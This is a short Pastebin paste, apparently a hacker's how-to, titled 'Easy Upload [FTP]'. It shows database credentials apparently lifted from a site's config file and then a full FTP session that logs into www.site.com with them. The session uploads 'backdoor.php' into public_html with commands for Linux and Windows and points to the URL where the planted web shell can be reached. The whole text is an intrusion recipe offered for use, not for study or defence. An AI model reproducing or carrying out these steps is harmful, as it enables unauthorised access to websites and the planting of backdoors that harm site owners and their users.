Advertisement
Evoo

Easy Upload [FTP]

Feb 10th, 2016
472
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.79 KB | None | 0 0
  1. Easy Upload Shell on Ftp
  2. $config['hostname'] = 'localhost';
  3. $config['username'] = 'lastc0de';
  4. $config['password'] = '*******';
  5.  
  6. Open Terminal/Cmd
  7. root@lastc0de#ftp www.site.com
  8. Connected to www.site.com
  9. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  10. 220-You are user number 3 of 50 allowed.
  11. 220-Local time is now 09:36. Server port: 21.
  12. 220-This is a private system - No anonymous login
  13. 220-IPv6 connections are also welcome on this server.
  14. 220 You will be disconnected after 15 minutes of inactivity.
  15. User (www.site.com:(none)):lastc0de
  16. 331 User lastc0de OK. Password required
  17. Password:*******
  18. ftp>cd public_html
  19. ftp>put backdoor.php //upload shell by linux terminal
  20. ftp>put C:\backdoor.php //upload shell by win cmd
  21.  
  22. Now Check on
  23. www.site.com/~lastc0de/backdoor.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement